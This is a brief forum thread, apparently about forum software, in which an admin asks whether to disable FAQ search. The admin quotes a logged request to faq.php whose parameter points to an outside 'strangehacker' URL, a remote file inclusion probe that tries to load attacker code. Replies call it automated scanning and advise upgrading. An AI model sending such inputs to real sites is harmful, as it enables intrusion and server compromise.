Disabling Search Function In The FAQ.

How can this be done? Is it a good idea to do this for security reasons? We are seeing alot of these types of entries on Whoseonline:

Viewing Error Message /ourboard/faq.php?faq=http://strangehackerURL/images/cs.txt? Viewing FAQ

If they are viewing an error message, as it shows, does that mean we've nothing to worry about? Just want to make sure, thanks.

The search feature from the FAQ is not a security risk. These are just automated scripts crawling the net to find exploitable forums. That link also has nothing to do with search itself.

Of course, I do strongly recommend to upgrade to the latest version, as it has the best security precautions build in as it is the latest branch.

I would love it if we upgraded to 3.7!
